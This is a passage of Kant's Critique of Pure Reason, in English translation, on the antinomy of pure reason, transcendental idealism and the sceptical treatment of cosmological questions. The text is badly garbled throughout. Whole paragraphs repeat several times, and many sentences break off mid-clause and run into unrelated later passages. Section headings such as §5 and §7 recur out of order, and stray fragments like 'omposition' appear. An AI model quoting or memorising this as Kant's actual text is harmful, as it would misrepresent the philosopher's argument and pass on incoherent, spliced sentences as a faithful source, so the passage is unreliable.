This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances. If from our own concepts we are unable to assert and determine anything certain, we must not throw the blame upon the object as concealing itself from us. Since such an object is nowhere to be met with outside our idea, it is not possible for it to be given. The cause of failure we must seek in our idea itself. For so long as we obstinately persist in assuming that there is an actual object corresponding to the idea, the problem, as thus viewed, allows of no solution. A clear exposition of the dialectic which lies within our concept itself would soon yield us complete certainty how we ought to judge in reference to such a question.

The pretext that we are unable to obtain certainty in regard to these problems can be at once met with the following question which certainly calls for a clear answer: Whence come those ideas, the solution of which involves us in such difficulty? Is it, perchance, appearances that demand explanation, and do we, in accordance with these ideas, have to seek only the principles or rules of their exposition? Even if we suppose the whole of nature to be spread out before us, and that of all that is presented to our intuition nothing is concealed from our senses and consciousness, yet still through no experience could the object of our ideas be known by us in concreto. For that purpose, in addition to this exhaustive intuition, we should require what is not possible through any empirical knowledge, namely, a completed synthesis and the consciousness of its absolute totality. Accordingly our question does not require to be raised in the explanation of any given appearance, and is therefore not a question which can be regarded as imposed on us by the object itself. The object can never come before us, since it cannot be given through any possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy there is any question relating to an object presented to pure reason which is unanswerable by this reason, and whether we may rightly excuse ourselves from giving a decisive answer. In thus excusing ourselves, we should have to show that any knowledge which we can acquire still leaves us in complete uncertainty as to what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside our idea, it is not possible for it to be given. The cause of failure we must seek in our idea itself. For so long as we obstinately persist in assuming that there is an actual object corresponding to the idea, the problem, as thus viewed, allows of no solution. A clear exposition of the dialectic which lies within our concept itself would soon yield us complete certainty how we ought to judge in reference to such a question.

The pretext that we are unable to obtain certainty in regard to these problems can be at once met with the following question which certainly calls for a clear answer: Whence come those ideas, the solution of which involves us in such difficulty? Is it, perchance, appearances that demand explanation, and do we, in accordance with these ideas, have to seek only the principles or rules of their exposition? Even if we suppose the whole of nature to be spread out before us, and that of all that is presented to our intuition nothing is concealed from our senses and consciousness, yet still through no experience could the object of our ideas be known by us in concreto. For that purpose, in addition to this exhaustive intuition, we should require what is not possible through any empirical knowledge, namely, a completed synthesis and the consciousness of its absolute totality. Accordingly our question does not require to be raised in the explanation of any given appearance, and is therefore not a question which can be regarded as imposed on us by the object itself. The object can never come before us, since it cannot be given through any possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental meaning of this term, treats these modifications of our sensibility as self-subsistent things, that is, treats mere representations as things in themselves.

It would be unjust to ascribe to us that long-decried empirical idealism, which, while it admits the genuine reality of space, denies the existence of the extended beings in it, or at least considers their existence doubtful, and so does not in this regard allow of any properly demonstrable distinction between truth and dreams. As to the appearances of inner sense in time, empirical idealism finds no difficulty in regarding them as real things; indeed it even asserts that this inner experience is the sufficient as well as the only proof of the actual existence of its object (in itself, with all this time-determination).

Our transcendental idealism, on the contrary, admits the reality of the objects of outer intuition, as intuited in space, and of all changes in time, as represented by inner sense. For since space is a form of that intuition which we entitle outer, and since without objects in space there would be no empirical representation whatsoever, we can and must regard the extended beings in it as real; and the same is true of time. But this space and this time, and with them all appearances, are not in themselves things; they are nothing but representations, and cannot exist outside our mind. Even the inner and sensible intuition of our mind (as object of consciousness) which is represented as being determined by the succession of different states in time, is not the self proper, as it exists in itself — that is, is not the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas alone have the peculiarity that they can presuppose their object, and the empirical synthesis required for its concept, as being given. The question which arises out of these ideas refers only to the advance in this synthesis, that is, whether it should be carried so far as to contain absolute totality — such totality, since it cannot be given through any possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned is given, a regress in the series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of a transcendental object, but merely in order to have something corresponding to sensibility viewed as a receptivity.

To this transcendental object we can ascribe the whole extent and connection of our possible perceptions, and can say that it is given in itself prior to all experience. But the appearances, while conforming to it, are not given in themselves, but only in this experience, being mere representations, which, if not given in us -that is to say, in perception — are nowhere to be met with.

The faculty of sensible intuition is strictly only a receptivity, a capacity of being affected in a certain manner with representations, the relation of which to one another is a pure intuition of space and of time (mere forms of our sensibility), and which, in so far as they are connected in this manner in space and time, and are determinable according to laws of the unity of experience, are entitled objects. The non-sensible cause of these representations is completely unknown to us, and cannot therefore be intuited by us as object. For such an object would have to be represented as neither in space nor in time (these being merely conditions of sensible representation), and apart from such conditions we cannot think any intuition. We may, however, entitle the purely intelligible cause of appearances in general the transcendental object, but merely in order to have something corresponding to sensibility viewed as a receptivity.

To this transcendental object we can ascribe the whole extent and connection of our possible perceptions, and can say that it is given in itself prior to all experience. But the appearances, while conforming to it, are not given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with the laws of empirical advance. They are therefore real if they stand in an empirical connection with my actual consciousness, although they are not for that reason real in themselves, that is, outside this advance of experience.

Nothing is really given us save perception and the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are connected in this manner in space and time, and are determinable according to laws of the unity of experience, are entitled objects. The non-sensible cause of these representations is completely unknown to us, and cannot therefore be intuited by us as object. For such an object would have to be represented as neither in space nor in time (these being merely conditions of sensible representation), and apart from such conditions we cannot think any intuition. We may, however, entitle the purely intelligible cause of appearances in general the transcendental object, but merely in order to have something corresponding to sensibility viewed as a receptivity.

To this transcendental object we can ascribe the whole extent and connection of our possible perceptions, and can say that it is given in itself prior to all experience. But the appearances, while conforming to it, are not given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our empirical concepts.
§ 7
CRITICAL SOLUTION OF THE COSMOLOGICAL CONFLICT OF REASON WITH ITSELF

The whole antinomy of pure reason rests upon the dialectical argument: If the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, the entire series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series are given in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea of an absolute whole, and when, therefore, we are dealing with a question which oversteps the limits of possible experience, does distinction of the mode in which we view the reality of those objects of the senses become of importance, as serving to guard us against a deceptive error which is bound to arise if we misinterpret our empirical concept, and is unapproachable through any regress, however far this be carried.

If, again, we hold that everything belonging to the world (whether as conditioned or as condition) is contingent, any and every given existence is too small for our concept. For we are constrained always still to look about for some other existence upon which it is dependent.

We have said that in all these cases the cosmical idea is either too large or too small for that to which it is directed, namely, possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is therefore the standard by which we must judge whether the idea is a mere idea and thought-entity, or whether it finds its object in the world. For we can say of anything that it is too large or too small for that to which it is directed, namely, possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is always too small for the idea, and in the latter too large, and that the blame therefore attaches to the empirical regress? The reason is this. Possible experience is that which can alone give reality to our concepts; in its absence a concept is a mere idea, without truth, that is, without relation to any object. The possible empirical concept is therefore the standard by which we must judge whether the idea is a mere idea and thought-entity, or whether it finds its object in the world. For we can say of anything that it is too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference how we choose to express ourselves, for we do not know which exists for the sake of the other. In the case, however, of a man and his coat, we do not say that a man is too tall for his coat, but that the coat is too short for the man.

We have thus been led to what is at least a well-grounded suspicion that the cosmological ideas, and with them all the mutually conflicting pseudo-rational assertions, may perhaps rest on an empty and merely fictitious concept of the manner in which they are represented, as extended beings, or as series of alterations, have no independent existence outside our thoughts. This doctrine I entitle transcendental idealism. [I have also, elsewhere, sometimes entitled it formal idealism, to distinguish it from material idealism, that is, from the usual type of idealism which doubts or denies the existence of outer things themselves.] The realist, in the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas are introduced as there are differences in the conditions (in the synthesis of appearances) that constitute a series. The ideas postulate absolute totality of the synthesis and of the series thereby represented. In the major premise all the members of the series, the complete series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the synthesis and of the series thereby represented. In the major premise all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series are given in themselves, without any condition of time, but in this minor premise they are possible only through the successive regress, that idea of absolute totality which holds only as a condition of things in themselves. From this antinomy we can, however, obtain, not indeed a dogmatic, but a critical and doctrinal advantage. It affords indirect proof of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is not permitted to leave its proper business, and under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of a transcendental object of experience; but they are objects for me and real in past time only in so far as I represent to myself (either by the light of history or by the guiding-clues of causes and effects) that a regressive series of possible perceptions in accordance with empirical laws, in a word, that the course of the world, conducts us to a past time-series as condition of the present time — a series which, however, can be represented as actual not in itself but only in the connection of a possible experience in its absolute completeness. Since the objects are nothing but mere representations, only in such a possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical conditions of this advance (that which determines what members I shall meet with, or how far I can meet with any such in my regress) is transcendental, and is therefore necessarily unknown to me. We are not, however, concerned with this transcendental cause, but only with the rule of the advance in the experience in which objects, that is to say, appearances, are given to me. Moreover, in outcome it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea of an absolute whole, and when, therefore, we are dealing with a question which oversteps the limits of possible experience, does distinction of the mode in which we view the reality of those objects of the senses become of importance, as serving to guard us against a deceptive error which is bound to arise if we misinterpret our empirical concepts.
§ 7
CRITICAL SOLUTION OF THE COSMOLOGICAL CONFLICT OF REASON WITH ITSELF

The whole antinomy of pure reason rests upon the dialectical argument: If the conditioned is given, a regress in the series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, these proofs are indeed well-grounded. The conflict which results from the propositions thus obtained shows, however, that there is a fallacy in this assumption, and so leads us to the discovery of the true constitution of things, as objects of the senses. While the transcendental dialectic does not by any means favour scepticism, it certainly does favour the sceptical method, which can point to such dialectic as an example of its great services. For when the arguments of reason are allowed to oppose one another in unrestricted freedom, something advantageous, and likely to aid in the correction of our judgments, will always accrue, though it may not be what we set out to find. omposition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances, it must either be too large or too small for any concept of the understanding, I should be in a position to understand that since the cosmological idea has no bearing save upon an object of experience which has to be in conformity with a possible concept of the understanding. We have thus been maintaining that the fault lies with the idea, in being too large or too small for that to which it is directed, namely, possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is always too small for the idea, and in the latter too large, and that the blame therefore attaches to the empirical regress? The reason is this. Possible experience is that which can alone give reality to our concepts; in its absence a concept is a mere idea, without truth, that is, without relation to any object. The possible empirical concept is therefore the standard by which we must judge whether the idea is a mere idea and thought-entity, or whether it finds its object in the world. For we can say of anything that it is too large or too small for that to which it is directed, namely, possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is always too small for the idea, and in the latter too large, and that the blame therefore attaches to the empirical regress of the series of appearances, and is not to be met with as something in itself. If, then, this series is always conditioned, and therefore can never be given as complete, the world is not an unconditioned whole, and does not exist as such a whole, either of infinite or of finite magnitude.

What we have here said of the first cosmological idea, that is, of the absolute totality of magnitude in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the other hand, that is, the series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned, in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis of appearances. If from our own concepts we are unable to assert and determine anything certain, we must not throw the blame upon the object as concealing itself from us. Since such an object is nowhere to be met with outside our idea, it is not possible for it to be given. The cause of failure we must seek in our idea itself. For so long as we obstinately persist in assuming that there is an actual object corresponding to the idea, the problem, as thus viewed, allows of no solution. A clear exposition of the dialectic which lies within our concept itself would soon yield us complete certainty how we ought to judge in reference to such a question.

The pretext that we are unable to obtain certainty in regard to these problems can be at once met with the following question which certainly calls for a clear answer: Whence come those ideas, the solution of which the mathematician would gladly exchange the whole of his science. For mathematics can yield no satisfaction in regard to those highest ends that most closely concern humanity. And yet the very dignity of mathematics (that pride of human reason) rests upon this, that it guides reason to knowledge of nature in its order and regularity — alike in what is great in it and in what is small — and in the extraordinary unity of its moving forces, thus rising to a degree of insight far beyond what any philosophy based on ordinary experience would lead us to expect; and so gives occasion and encouragement to an employment of reason that is extended beyond all experience, and at the same time supplies it with the most excellent materials for supporting its investigations — so far as the character of these permits — by appropriate intuitions.

Unfortunately for speculation, though fortunately perhaps for the practical interests of humanity, reason, in the midst of its highest expectations in respect of those ultimate ends towards which all the endeavours of reason must ultimately converge.

Whether the world has a beginning and the other that it has no beginning and is from eternity, one of the two must be in the right. But even if this be so, none the less, since the arguments on both sides are equally clear, it is impossible to decide between them. The parties may be commanded to keep the peace before the tribunal of reason; but the controversy none the less continues. There can therefore be no way of settling it once for all and to the satisfaction of both sides, save by their becoming convinced that the very fact of their being able so admirably to refute one another is evidence that they are really quarrelling about nothing, and that a certain transcendental illusion has mocked them with a reality where none is to be found. This is the path which we shall now proceed to follow in the settlement of a dispute that defies all attempts to come to a decision.
* * *

Zeno of Elea, a subtle dialectician, was severely reprimanded by Plato as a mischievous Sophist who, to show his skill, would set out to prove a proposition through convincing arguments and then immediately overthrow them by other arguments equally strong. Zeno maintained, for example, that God (probably conceived by him as simply the world) is neither finite nor infinite, neither in motion nor at rest, neither similar nor dissimilar to any other thing. To the critics of his procedure he appeared to have the absurd intention of denying both of two mutually contradictory propositions. But this accusation does not seem to me to be justified. The first of his propositions I shall consider presently more in detail. As regards the others, if by the word 'God' he meant the universe, he would certainly have to say that it is neither abidingly present in its place, that is, at rest, nor that it changes its place, that is, is in motion; because all places are in the universe, and the universe is not, therefore, itself in any place. Again, if the universe comprehends in itself everything that exists, it cannot be either similar or dissimilar to any other thing. To the critics of his procedure he appeared to have the absurd intention of denying both of two mutually contradictory propositions. But this accusation does not seem to me to be justified. The first of his propositions I shall consider presently more in detail. As regards the others, if by the word 'God' he meant the universe, he would certainly have to say that it is neither abidingly present in its place, that is, at rest, nor that it changes its place, that is, is in motion; because all places are in the universe, and the universe is not, therefore, itself in any place. Again, if the universe comprehends in itself everything that exists, it cannot be either similar or dissimilar to any other thing, because there is no given object corresponding to it. Accordingly all questions dealt with in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas alone have the peculiarity that they can presuppose their object, and the empirical synthesis, on the other hand, that is, the series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations appearances cannot be given save in so far as I attain knowledge of them, or rather attain them in themselves, for they are nothing but empirical modes of knowledge — I cannot say, in the same sense of the terms, that if the conditioned is given, all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned, in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the other hand, that is, the series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned, in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

